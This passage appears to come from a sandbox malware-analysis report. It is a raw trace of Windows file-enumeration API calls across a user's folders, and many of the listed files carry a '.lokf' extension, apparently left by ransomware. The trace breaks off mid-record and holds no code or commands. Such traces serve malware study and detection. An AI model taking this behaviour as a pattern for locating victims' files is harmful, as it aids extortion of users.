PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.625] PathFindFileNameW (pszPath="") returned="" [0146.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x208bab90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.625] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x208bab90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.625] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c23fe0, ftCreationTime.dwHighDateTime=0x1d4d0c9, ftLastAccessTime.dwLowDateTime=0x6231a9f0, ftLastAccessTime.dwHighDateTime=0x1d4cc57, ftLastWriteTime.dwLowDateTime=0x20848770, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x15c84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-UhIDPZCm6I2UoJXWw.mkv.lokf", cAlternateFileName="-UHIDP~1.LOK")) returned 1 [0146.625] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x210c35d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x210c35d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="27nF", cAlternateFileName="")) returned 1 [0146.625] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe043560, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x8b63bb70, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0x2086e8d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x451e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8MMWzVzn.mp4.lokf", cAlternateFileName="8MMWZV~1.LOK")) returned 1 [0146.625] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b58340, ftCreationTime.dwHighDateTime=0x1d4ca45, ftLastAccessTime.dwLowDateTime=0xd9aec6a0, ftLastAccessTime.dwHighDateTime=0x1d4c5a6, ftLastWriteTime.dwLowDateTime=0x20894a30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa335, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9P25HE-ZzsQt.mkv.lokf", cAlternateFileName="9P25HE~1.LOK")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4372100, ftCreationTime.dwHighDateTime=0x1d4d4e8, ftLastAccessTime.dwLowDateTime=0xe5687140, ftLastAccessTime.dwHighDateTime=0x1d4ce5b, ftLastWriteTime.dwLowDateTime=0x20894a30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xcf5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GIpLP30n0FbK.mkv.lokf", cAlternateFileName="GIPLP3~1.LOK")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x2115bb50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2115bb50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jYsvlZ", cAlternateFileName="")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df21e80, ftCreationTime.dwHighDateTime=0x1d4cb11, ftLastAccessTime.dwLowDateTime=0x81f3b8c0, ftLastAccessTime.dwHighDateTime=0x1d4ca43, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8ea5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="otAFCyQ0nHxWrUo d.mkv.lokf", cAlternateFileName="OTAFCY~1.LOK")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf.lokf", cAlternateFileName="XBDXFZ~1.LOK")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf.lokf", cAlternateFileName="XBDXFZ~1.LOK")) returned 0 [0146.626] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.626] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.626] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.626] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0146.626] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0146.626] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.626] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.626] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.626] PathFindFileNameW (pszPath="") returned="" [0146.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0146.626] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0146.627] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0146.627] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.627] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.627] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.627] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\") returned="NxkfKpMd\\" [0146.627] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0146.627] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.627] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.627] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.627] PathFindFileNameW (pszPath="") returned="" [0146.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.628] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.629] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.629] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0146.629] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.629] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.629] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.629] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.629] PathFindFileNameW (pszPath="") returned="" [0146.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png.lokf", cAlternateFileName="ZI78PN~1.LOK")) returned 0xffffffff [0146.629] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.629] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0146.629] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.629] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.629] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.629] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.629] PathFindFileNameW (pszPath="") returned="" [0146.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png.lokf", cAlternateFileName="ZI78PN~1.LOK")) returned 0xffffffff [0146.629] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.630] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0146.630] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.630] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.630] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.630] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.630] PathFindFileNameW (pszPath="") returned="" [0146.630] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.631] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.631] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.631] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0146.631] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.631] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.631] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.631] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.631] PathFindFileNameW (pszPath="") returned="" [0146.631] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x211a7e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0146.631] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.631] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0146.631] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.631] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.631] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.631] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.631] PathFindFileNameW (pszPath="") returned="" [0146.631] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x20a83c10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20a83c10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.632] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.632] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.632] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\") returned="R4I1Q ij0VYYLZ2qE\\" [0146.632] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.632] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.633] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.633] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.633] PathFindFileNameW (pszPath="") returned="" [0146.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x20acfed0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20acfed0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.634] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.635] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.635] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0146.635] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0146.635] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.635] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.635] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.635] PathFindFileNameW (pszPath="") returned="" [0146.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x20b8e5b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.637] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.638] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0146.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0146.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.638] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.638] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.638] PathFindFileNameW (pszPath="") returned="" [0146.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20bda870, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20bda870, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.638] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.638] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0146.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0146.639] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.639] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.639] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.639] PathFindFileNameW (pszPath="") returned="" [0146.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20c4cc90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20c4cc90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.640] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.641] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0146.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0146.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.641] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.641] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.641] PathFindFileNameW (pszPath="") returned="" [0146.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, 